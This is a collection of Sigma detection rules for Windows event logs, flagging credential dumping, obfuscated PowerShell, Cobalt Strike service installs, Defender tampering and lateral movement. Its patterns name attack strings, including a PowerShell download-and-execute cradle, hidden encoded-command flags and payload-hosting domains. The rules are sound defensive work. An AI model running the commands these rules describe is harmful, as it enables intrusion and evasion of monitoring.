Detection logic
condition: selection
selection:
EventID: 4649
Malicious Service Installations
- source: sigma
- technicques:
- t1003
- t1543
- t1543.003
- t1569
- t1569.002
Description
Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
Detection logic
condition: selection and 1 of malsvc_*
malsvc_apt29:
ServiceName: javamtsup
selection:
EventID: 4697
Suspicious Teams Application Related ObjectAcess Event
- source: sigma
- technicques:
- t1528
Description
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
Detection logic
condition: selection and not filter
filter:
ProcessName|contains: \Microsoft\Teams\current\Teams.exe
selection:
EventID: 4663
ObjectName|contains:
- \Microsoft\Teams\Cookies
- \Microsoft\Teams\Local Storage\leveldb
Windows Event Auditing Disabled
- source: sigma
- technicques:
- t1562
- t1562.002
Description
Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off “Local Group Policy Object Processing” via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as “gpedit.msc”. Please note, that disabling “Local Group Policy Object Processing” may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_guid:
SubcategoryGuid:
- '{0CCE9210-69AE-11D9-BED3-505054503030}'
- '{0CCE9211-69AE-11D9-BED3-505054503030}'
- '{0CCE9212-69AE-11D9-BED3-505054503030}'
- '{0CCE9215-69AE-11D9-BED3-505054503030}'
- '{0CCE9217-69AE-11D9-BED3-505054503030}'
- '{0CCE921B-69AE-11D9-BED3-505054503030}'
- '{0CCE922B-69AE-11D9-BED3-505054503030}'
- '{0CCE922F-69AE-11D9-BED3-505054503030}'
- '{0CCE9230-69AE-11D9-BED3-505054503030}'
- '{0CCE9235-69AE-11D9-BED3-505054503030}'
- '{0CCE9236-69AE-11D9-BED3-505054503030}'
- '{0CCE9237-69AE-11D9-BED3-505054503030}'
- '{0CCE923F-69AE-11D9-BED3-505054503030}'
- '{0CCE9240-69AE-11D9-BED3-505054503030}'
- '{0CCE9242-69AE-11D9-BED3-505054503030}'
selection:
AuditPolicyChanges|contains:
- '%%8448'
- '%%8450'
EventID: 4719
SAM Registry Hive Handle Request
- source: sigma
- technicques:
- t1012
- t1552
- t1552.002
Description
Detects handles requested to SAM registry hive
Detection logic
condition: selection
selection:
EventID: 4656
ObjectName|endswith: \SAM
ObjectType: Key
Invoke-Obfuscation STDIN+ Launcher - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of stdin to execute PowerShell
Detection logic
condition: all of selection*
selection:
EventID: 4697
ServiceFileName|contains|all:
- cmd
- powershell
selection2:
ServiceFileName|contains:
- ${input}
- noexit
selection3:
ServiceFileName|contains:
- ' /c '
- ' /r '
New or Renamed User Account with ‘$’ Character
- source: sigma
- technicques:
- t1036
Description
Detects the creation of a user with the “$” character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.
Detection logic
condition: 1 of selection_* and not 1 of filter_main_*
filter_main_homegroup:
EventID: 4720
TargetUserName: HomeGroupUser$
selection_create:
EventID: 4720
SamAccountName|contains: $
selection_rename:
EventID: 4781
NewTargetUserName|contains: $
Sysmon Channel Reference Deletion
- source: sigma
- technicques:
- t1112
Description
Potential threat actor tampering with Sysmon manifest and eventually disabling it
Detection logic
condition: 1 of selection*
selection1:
EventID: 4657
NewValue: 0
ObjectName|contains:
- WINEVT\Publishers\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
- WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
ObjectValueName: Enabled
selection2:
AccessMask: 65536
EventID: 4663
ObjectName|contains:
- WINEVT\Publishers\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
- WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
PowerShell Scripts Installed as Services - Security
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects powershell script installed as a Service
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains:
- powershell
- pwsh
Important Scheduled Task Deleted/Disabled
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
Detection logic
condition: selection and not 1 of filter_*
filter_sys_username:
EventID: 4699
SubjectUserName|endswith: $
TaskName|contains: \Windows\Windows Defender\
selection:
EventID:
- 4699
- 4701
TaskName|contains:
- \Windows\SystemRestore\SR
- \Windows\Windows Defender\
- \Windows\BitLocker
- \Windows\WindowsBackup\
- \Windows\WindowsUpdate\
- \Windows\UpdateOrchestrator\Schedule
- \Windows\ExploitGuard
T1047 Wmiprvse Wbemcomn DLL Hijack
- source: sigma
- technicques:
- t1021
- t1021.002
- t1047
Description
Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network for a WMI DLL Hijack scenario.
Detection logic
condition: selection and not filter
filter:
SubjectUserName|endswith: $
selection:
EventID: 5145
RelativeTargetName|endswith: \wbem\wbemcomn.dll
Invoke-Obfuscation Via Use Clip - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains: (Clipboard|i
NetNTLM Downgrade Attack
- source: sigma
- technicques:
- t1112
- t1562
- t1562.001
Description
Detects NetNTLM downgrade attack
Detection logic
condition: selection
selection:
EventID: 4657
ObjectName|contains|all:
- \REGISTRY\MACHINE\SYSTEM
- ControlSet
- \Control\Lsa
ObjectValueName:
- LmCompatibilityLevel
- NtlmMinClientSec
- RestrictSendingNTLMTraffic
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains:
- '{0}'
- '{1}'
- '{2}'
- '{3}'
- '{4}'
- '{5}'
ServiceFileName|contains|all:
- '&&set'
- cmd
- /c
- -f
Invoke-Obfuscation Via Use MSHTA - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use MSHTA in Scripts
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains|all:
- mshta
- vbscript:createobject
- .run
- window.close
Remote Service Activity via SVCCTL Named Pipe
- source: sigma
- technicques:
- t1021
- t1021.002
Description
Detects remote service activity via remote access to the svcctl named pipe
Detection logic
condition: selection
selection:
Accesses|contains: WriteData
EventID: 5145
RelativeTargetName: svcctl
ShareName: \\\\\*\\IPC$
HackTool - EDRSilencer Execution - Filter Added
- source: sigma
- technicques:
- t1562
Description
Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.
Detection logic
condition: selection
selection:
EventID:
- 5441
- 5447
FilterName|contains: Custom Outbound Filter
Windows Defender Exclusion Reigstry Key - Write Access Requested
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.
Detection logic
condition: selection
selection:
AccessList|contains:
- '%%4417'
- '%%4418'
EventID:
- 4656
- 4663
ObjectName|contains: \Microsoft\Windows Defender\Exclusions\
User Logoff Event
- source: sigma
- technicques:
- t1531
Description
Detects a user log-off activity. Could be used for example to correlate information during forensic investigations
Detection logic
condition: selection
selection:
EventID:
- 4634
- 4647
Suspicious Scheduled Task Creation
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
Detection logic
condition: all of selection_*
selection_commands:
TaskContent|contains:
- regsvr32
- rundll32
- cmd.exe</Command>
- cmd</Command>
- '<Arguments>/c '
- '<Arguments>/k '
- '<Arguments>/r '
- powershell
- pwsh
- mshta
- wscript
- cscript
- certutil
- bitsadmin
- bash.exe
- 'bash '
- scrcons
- 'wmic '
- wmic.exe
- forfiles
- scriptrunner
- hh.exe
selection_eid:
EventID: 4698
selection_paths:
TaskContent|contains:
- \AppData\Local\Temp\
- \AppData\Roaming\
- \Users\Public\
- \WINDOWS\Temp\
- C:\Temp\
- \Desktop\
- \Downloads\
- \Temporary Internet
- C:\ProgramData\
- C:\Perflogs\
Weak Encryption Enabled and Kerberoast
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.
Detection logic
condition: selection and ((newuac_des and not olduac_des) or (newuac_preauth and not
olduac_preauth) or (newuac_encrypted and not olduac_encrypted))
newuac_des:
NewUacValue|endswith:
- 8???
- 9???
- A???
- B???
- C???
- D???
- E???
- F???
newuac_encrypted:
NewUacValue|endswith:
- 8??
- 9??
- A??
- B??
- C??
- D??
- E??
- F??
newuac_preauth:
NewUacValue|endswith:
- 1????
- 3????
- 5????
- 7????
- 9????
- B????
- D????
- F????
olduac_des:
OldUacValue|endswith:
- 8???
- 9???
- A???
- B???
- C???
- D???
- E???
- F???
olduac_encrypted:
OldUacValue|endswith:
- 8??
- 9??
- A??
- B??
- C??
- D??
- E??
- F??
olduac_preauth:
OldUacValue|endswith:
- 1????
- 3????
- 5????
- 7????
- 9????
- B????
- D????
- F????
selection:
EventID: 4738
ETW Logging Disabled In .NET Processes - Registry
- source: sigma
- technicques:
- t1112
- t1562
Description
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Detection logic
condition: 1 of selection_*
selection_complus:
EventID: 4657
NewValue: 0
ObjectName|contains: \Environment
ObjectValueName:
- COMPlus_ETWEnabled
- COMPlus_ETWFlags
selection_etw_enabled:
EventID: 4657
NewValue: 0
ObjectName|endswith: \SOFTWARE\Microsoft\.NETFramework
ObjectValueName: ETWEnabled
User Couldn’t Call a Privileged Service ‘LsaRegisterLogonProcess’
- source: sigma
- technicques:
- t1558
- t1558.003
Description
The ‘LsaRegisterLogonProcess’ function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.
Detection logic
condition: selection
selection:
EventID: 4673
Keywords: '0x8010000000000000'
Service: LsaRegisterLogonProcess()
Azure AD Health Service Agents Registry Keys Access
- source: sigma
- technicques:
- t1012
Description
This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.
Detection logic
condition: selection and not filter
filter:
ProcessName|contains:
- Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe
- Microsoft.Identity.Health.Adfs.InsightsService.exe
- Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe
- Microsoft.Identity.Health.Adfs.PshSurrogate.exe
- Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe
selection:
EventID:
- 4656
- 4663
ObjectName: \REGISTRY\MACHINE\SOFTWARE\Microsoft\ADHealthAgent
ObjectType: Key
Invoke-Obfuscation Via Stdin - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via Stdin in Scripts
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains:
- environment
- invoke
- ${input)
ServiceFileName|contains|all:
- set
- '&&'
Invoke-Obfuscation Obfuscated IEX Invocation - Security
- source: sigma
- technicques:
- t1027
Description
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
Detection logic
condition: all of selection_*
selection_eid:
EventID: 4697
selection_servicefilename:
- ServiceFileName|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[
- ServiceFileName|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[
- ServiceFileName|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[
- ServiceFileName|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2}
- ServiceFileName|re: \\*mdr\*\W\s*\)\.Name
- ServiceFileName|re: \$VerbosePreference\.ToString\(
- ServiceFileName|re: \String\]\s*\$VerbosePreference
WCE wceaux.dll Access
- source: sigma
- technicques:
- t1003
Description
Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
Detection logic
condition: selection
selection:
EventID:
- 4656
- 4658
- 4660
- 4663
ObjectName|endswith: \wceaux.dll
Suspicious PsExec Execution
- source: sigma
- technicques:
- t1021
- t1021.002
Description
detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one
Detection logic
condition: selection1 and not filter
filter:
RelativeTargetName|startswith: PSEXESVC
selection1:
EventID: 5145
RelativeTargetName|endswith:
- -stdin
- -stdout
- -stderr
ShareName: \\\\\*\\IPC$
Invoke-Obfuscation COMPRESS OBFUSCATION - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains:
- system.io.compression.deflatestream
- system.io.streamreader
ServiceFileName|contains|all:
- new-object
- text.encoding]::ascii
- readtoend
Processes Accessing the Microphone and Webcam
- source: sigma
- technicques:
- t1123
Description
Potential adversaries accessing the microphone and webcam in an endpoint.
Detection logic
condition: selection
selection:
EventID:
- 4657
- 4656
- 4663
ObjectName|contains:
- \SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged
- \SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged
Windows Defender Exclusion Deleted
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions
Detection logic
condition: selection
selection:
EventID: 4660
ObjectName|contains: \Microsoft\Windows Defender\Exclusions\
AD Object WriteDAC Access
- source: sigma
- technicques:
- t1222
- t1222.001
Description
Detects WRITE_DAC access to a domain object
Detection logic
condition: selection
selection:
AccessMask: '0x40000'
EventID: 4662
ObjectServer: DS
ObjectType:
- 19195a5b-6da0-11d0-afd3-00c04fd930c9
- domainDNS
Device Installation Blocked
- source: sigma
- technicques:
- t1200
Description
Detects an installation of a device that is forbidden by the system policy
Detection logic
condition: selection
selection:
EventID: 6423
Add or Remove Computer from DC
- source: sigma
- technicques:
- t1207
Description
Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.
Detection logic
condition: selection
selection:
EventID:
- 4741
- 4743
Invoke-Obfuscation CLIP+ Launcher - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Clip.exe to execute PowerShell
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains|all:
- cmd
- '&&'
- 'clipboard]::'
DCOM InternetExplorer.Application Iertutil DLL Hijack - Security
- source: sigma
- technicques:
- t1021
- t1021.002
- t1021.003
Description
Detects a threat actor creating a file named iertutil.dll in the C:\Program Files\Internet Explorer\ directory over the network for a DCOM InternetExplorer DLL Hijack scenario.
Detection logic
condition: selection and not filter
filter:
SubjectUserName|endswith: $
selection:
EventID: 5145
RelativeTargetName|endswith: \Internet Explorer\iertutil.dll
Remote Task Creation via ATSVC Named Pipe
- source: sigma
- technicques:
- t1053
- t1053.002
Description
Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
Detection logic
condition: selection
selection:
Accesses|contains: WriteData
EventID: 5145
RelativeTargetName: atsvc
ShareName: \\\\\*\\IPC$
Impacket PsExec Execution
- source: sigma
- technicques:
- t1021
- t1021.002
Description
Detects execution of Impacket’s psexec.py.
Detection logic
condition: selection1
selection1:
EventID: 5145
RelativeTargetName|contains:
- RemCom_stdin
- RemCom_stdout
- RemCom_stderr
ShareName: \\\\\*\\IPC$
HackTool - NoFilter Execution
- source: sigma
- technicques:
- t1134
- t1134.001
Description
Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators
Detection logic
condition: 1 of selection_*
selection_5447:
EventID: 5447
FilterName|contains: RonPolicy
selection_5449:
EventID: 5449
ProviderContextName|contains: RonPolicy
Win Susp Computer Name Containing Samtheadmin
- source: sigma
- technicques:
- t1078
Description
Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
Detection logic
condition: 1 of selection*
selection1:
SamAccountName|endswith: $
SamAccountName|startswith: SAMTHEADMIN-
selection2:
TargetUserName|endswith: $
TargetUserName|startswith: SAMTHEADMIN-
Active Directory User Backdoors
- source: sigma
- technicques:
- t1098
Description
Detects scenarios where one can control another users or computers account without having to use their credentials.
Detection logic
condition: (selection1 and not 1 of filter_*) or 1 of selection_5136_*
filter_empty:
AllowedToDelegateTo:
- ''
- '-'
filter_null:
AllowedToDelegateTo: null
selection1:
EventID: 4738
selection_5136_1:
AttributeLDAPDisplayName: msDS-AllowedToDelegateTo
EventID: 5136
selection_5136_2:
AttributeLDAPDisplayName: servicePrincipalName
EventID: 5136
ObjectClass: user
selection_5136_3:
AttributeLDAPDisplayName: msDS-AllowedToActOnBehalfOfOtherIdentity
EventID: 5136
SysKey Registry Keys Access
- source: sigma
- technicques:
- t1012
Description
Detects handle requests and access operations to specific registry keys to calculate the SysKey
Detection logic
condition: selection
selection:
EventID:
- 4656
- 4663
ObjectName|endswith:
- lsa\JD
- lsa\GBG
- lsa\Skew1
- lsa\Data
ObjectType: key
SCM Database Handle Failure
- source: sigma
- technicques:
- t1010
Description
Detects non-system users failing to get a handle of the SCM database.
Detection logic
condition: selection and not filter
filter:
SubjectLogonId: '0x3e4'
selection:
AccessMask: '0xf003f'
EventID: 4656
ObjectName: ServicesActive
ObjectType: SC_MANAGER OBJECT
Suspicious Windows ANONYMOUS LOGON Local Account Created
- source: sigma
- technicques:
- t1136
- t1136.001
- t1136.002
Description
Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
Detection logic
condition: selection
selection:
EventID: 4720
SamAccountName|contains|all:
- ANONYMOUS
- LOGON
Suspicious Scheduled Task Update
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Detects update to a scheduled task event that contain suspicious keywords.
Detection logic
condition: all of selection_*
selection_commands:
TaskContentNew|contains:
- regsvr32
- rundll32
- cmd.exe</Command>
- cmd</Command>
- '<Arguments>/c '
- '<Arguments>/k '
- '<Arguments>/r '
- powershell
- pwsh
- mshta
- wscript
- cscript
- certutil
- bitsadmin
- bash.exe
- 'bash '
- scrcons
- 'wmic '
- wmic.exe
- forfiles
- scriptrunner
- hh.exe
selection_eid:
EventID: 4702
selection_paths:
TaskContentNew|contains:
- \AppData\Local\Temp\
- \AppData\Roaming\
- \Users\Public\
- \WINDOWS\Temp\
- C:\Temp\
- \Desktop\
- \Downloads\
- \Temporary Internet
- C:\ProgramData\
- C:\Perflogs\
Windows Pcap Drivers
- source: sigma
- technicques:
- t1040
Description
Detects Windows Pcap driver installation based on a list of associated .sys files.
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains:
- pcap
- npcap
- npf
- nm3
- ndiscap
- nmnt
- windivert
- USBPcap
- pktmon
Invoke-Obfuscation RUNDLL LAUNCHER - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains|all:
- rundll32.exe
- shell32.dll
- shellexec_rundll
- powershell
Hidden Local User Creation
- source: sigma
- technicques:
- t1136
- t1136.001
Description
Detects the creation of a local hidden user account which should not happen for event ID 4720.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_homegroup:
TargetUserName: HomeGroupUser$
selection:
EventID: 4720
TargetUserName|endswith: $
LSASS Access From Non System Account
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects potential mimikatz-like tools accessing LSASS from non system account
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_generic:
ProcessName|contains:
- :\Program Files\
- :\Program Files (x86)\
filter_main_service_account:
SubjectUserName|endswith: $
filter_main_wmiprvse:
AccessMask: '0x1410'
ProcessName: C:\Windows\System32\wbem\WmiPrvSE.exe
filter_optional_steam:
ProcessName|contains: \SteamLibrary\steamapps\
selection:
AccessMask:
- '0x100000'
- '0x1010'
- '0x1400'
- '0x1410'
- '0x1418'
- '0x1438'
- '0x143a'
- '0x1f0fff'
- '0x1f1fff'
- '0x1f2fff'
- '0x1f3fff'
- '0x40'
- 143a
- 1f0fff
- 1f1fff
- 1f2fff
- 1f3fff
EventID:
- 4663
- 4656
ObjectName|endswith: \lsass.exe
ObjectType: Process
CobaltStrike Service Installations - Security
- source: sigma
- technicques:
- t1021
- t1021.002
- t1543
- t1543.003
- t1569
- t1569.002
Description
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
Detection logic
condition: event_id and 1 of selection*
event_id:
EventID: 4697
selection1:
ServiceFileName|contains|all:
- ADMIN$
- .exe
selection2:
ServiceFileName|contains|all:
- '%COMSPEC%'
- start
- powershell
selection3:
ServiceFileName|contains: powershell -nop -w hidden -encodedcommand
selection4:
ServiceFileName|base64offset|contains: 'IEX (New-Object Net.Webclient).DownloadString(''http://127.0.0.1:'
Enabled User Right in AD to Control User Objects
- source: sigma
- technicques:
- t1098
Description
Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.
Detection logic
condition: all of selection*
selection_base:
EventID: 4704
selection_keywords:
PrivilegeList|contains: SeEnableDelegationPrivilege
Service Installed By Unusual Client - Security
- source: sigma
- technicques:
- t1543
Description
Detects a service installed by a client which has PID 0 or whose parent has PID 0
Detection logic
condition: all of selection_*
selection_eid:
EventID: 4697
selection_pid:
- ClientProcessId: 0
- ParentProcessId: 0
Password Dumper Activity on LSASS
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
Detection logic
condition: selection
selection:
AccessMask: '0x705'
EventID: 4656
ObjectType: SAM_DOMAIN
ProcessName|endswith: \lsass.exe
Invoke-Obfuscation Via Use Rundll32 - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains:
- value
- invoke
- comspec
- iex
ServiceFileName|contains|all:
- '&&'
- rundll32
- shell32.dll
- shellexec_rundll
A Security-Enabled Global Group Was Deleted
- source: sigma
- technicques:
- t1098
Description
Detects activity when a security-enabled global group is deleted
Detection logic
condition: selection
selection:
EventID:
- 4730
- 634
RottenPotato Like Attack Pattern
- source: sigma
- technicques:
- t1557
- t1557.001
Description
Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like
Detection logic
condition: selection
selection:
EventID: 4624
IpAddress:
- 127.0.0.1
- ::1
LogonType: 3
TargetUserName: ANONYMOUS LOGON
WorkstationName: '-'
A Member Was Removed From a Security-Enabled Global Group
- source: sigma
- technicques:
- t1098
Description
Detects activity when a member is removed from a security-enabled global group
Detection logic
condition: selection
selection:
EventID:
- 633
- 4729
RDP Login from Localhost
- source: sigma
- technicques:
- t1021
- t1021.001
Description
RDP login with localhost source address may be a tunnelled login
Detection logic
condition: selection
selection:
EventID: 4624
IpAddress:
- ::1
- 127.0.0.1
LogonType: 10
A Member Was Added to a Security-Enabled Global Group
- source: sigma
- technicques:
- t1098
Description
Detects activity when a member is added to a security-enabled global group
Detection logic
condition: selection
selection:
EventID:
- 4728
- 632
KrbRelayUp Attack Pattern
- source: sigma
- technicques:
Description
Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like
Detection logic
condition: selection
selection:
AuthenticationPackageName: Kerberos
EventID: 4624
IpAddress: 127.0.0.1
LogonType: 3
TargetUserSid|endswith: '-500'
TargetUserSid|startswith: S-1-5-21-
Deployment AppX Package Was Blocked By AppLocker
- source: sigma
- technicques:
Description
Detects an appx package deployment that was blocked by AppLocker policy
Detection logic
condition: selection
selection:
EventID: 412
Uncommon AppX Package Locations
- source: sigma
- technicques:
Description
Detects an appx package added the pipeline of the “to be processed” packages which is located in uncommon locations
Detection logic
condition: selection and not 1 of filter_*
filter_generic:
Path|contains:
- C:\Program Files\WindowsApps\
- C:\Program Files (x86)\
- C:\Windows\SystemApps\
- C:\Windows\PrintDialog\
- C:\Windows\ImmersiveControlPanel\
- x-windowsupdate://
- file:///C:/Program%20Files
filter_specific:
Path|contains:
- https://statics.teams.cdn.office.net/
- microsoft.com
selection:
EventID: 854
Suspicious AppX Package Locations
- source: sigma
- technicques:
Description
Detects an appx package added the pipeline of the “to be processed” packages which is located in suspicious locations
Detection logic
condition: selection
selection:
EventID: 854
Path|contains:
- C:\Users\Public\
- /users/public/
- C:\PerfLogs\
- C:/perflogs/
- \Desktop\
- /desktop/
- \Downloads\
- /Downloads/
- C:\Windows\Temp\
- C:/Windows/Temp/
- \AppdData\Local\Temp\
- /AppdData/Local/Temp/
Suspicious Remote AppX Package Locations
- source: sigma
- technicques:
Description
Detects an appx package added the pipeline of the “to be processed” packages which is downloaded from a suspicious domain
Detection logic
condition: selection
selection:
EventID: 854
Path|contains:
- .githubusercontent.com
- anonfiles.com
- cdn.discordapp.com
- cdn.discordapp.com/attachments/
- ddns.net
- dl.dropboxusercontent.com
- ghostbin.co
- glitch.me
- gofile.io
- hastebin.com
- mediafire.com
- mega.nz
- onrender.com
- paste.ee
- pastebin.com
- pastebin.pl
- pastetext.net
- privatlab.com
- privatlab.net
- send.exploit.in
- sendspace.com
- storage.googleapis.com
- storjshare.io
- supabase.co
- temp.sh
- transfer.sh
- ufile.io
Deployment Of The AppX Package Was Blocked By The Policy
- source: sigma
- technicques:
Description
Detects an appx package deployment that was blocked by the local computer policy
Detection logic
condition: selection
selection:
EventID:
- 441
- 442
- 453
- 454
CodeIntegrity - Blocked Driver Load With Revoked Certificate
- source: sigma
- technicques:
- t1543
Description
Detects blocked load attempts of revoked drivers
Detection logic
condition: selection
selection:
EventID: 3023
CodeIntegrity - Blocked Image/Driver Load For Policy Violation
- source: sigma
- technicques:
- t1543
Description
Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.
Detection logic
condition: selection
selection:
EventID: 3077
Active Directory Certificate Services Denied Certificate Enrollment Request
- source: sigma
- technicques:
- t1553
- t1553.004
Description
Detects denied requests by Active Directory Certificate Services. Example of these requests denial include issues with permissions on the certificate template or invalid signatures.
Detection logic
condition: selection
selection:
EventID: 53
Provider_Name: Microsoft-Windows-CertificationAuthority
Potential CVE-2021-42287 Exploitation Attempt
- source: sigma
- technicques:
- t1558
- t1558.003
Description
The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
Detection logic
condition: selection
selection:
EventID:
- 16990
- 16991
Provider_Name: Microsoft-Windows-Directory-Services-SAM
Service Installed By Unusual Client - System
- source: sigma
- technicques:
- t1543
Description
Detects a service installed by a client which has PID 0 or whose parent has PID 0
Detection logic
condition: selection
selection:
EventID: 7045
ProcessId: 0
Provider_Name: Service Control Manager
Invoke-Obfuscation RUNDLL LAUNCHER - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains|all:
- rundll32.exe
- shell32.dll
- shellexec_rundll
- powershell
Provider_Name: Service Control Manager
Invoke-Obfuscation Via Stdin - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via Stdin in Scripts
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains:
- environment
- invoke
- input
ImagePath|contains|all:
- set
- '&&'
Provider_Name: Service Control Manager
Uncommon Service Installation Image Path
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
Detection logic
condition: selection and ( suspicious_paths or all of suspicious_encoded_* ) and not
1 of filter_main_* and not 1 of filter_optional_*
filter_main_defender_def_updates:
ImagePath|startswith: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\
filter_optional_thor_remote:
ImagePath|startswith: C:\WINDOWS\TEMP\thor10-remote\thor64.exe
selection:
EventID: 7045
Provider_Name: Service Control Manager
suspicious_encoded_flag:
ImagePath|contains: ' -e'
suspicious_encoded_keywords:
ImagePath|contains:
- ' aQBlAHgA'
- ' aWV4I'
- ' IAB'
- ' JAB'
- ' PAA'
- ' SQBFAFgA'
- ' SUVYI'
suspicious_paths:
ImagePath|contains:
- \\\\.\\pipe
- \Users\Public\
- \Windows\Temp\
CSExec Service Installation
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects CSExec service installation and execution events
Detection logic
condition: all of selection_*
selection_eid:
EventID: 7045
Provider_Name: Service Control Manager
selection_service:
- ServiceName: csexecsvc
- ImagePath|endswith: \csexecsvc.exe
Suspicious Service Installation
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects suspicious service installation commands
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains:
- ' -nop '
- ' -sta '
- ' -w hidden '
- :\Temp\
- .downloadfile(
- .downloadstring(
- \ADMIN$\
- \Perflogs\
- '&&'
Provider_Name: Service Control Manager
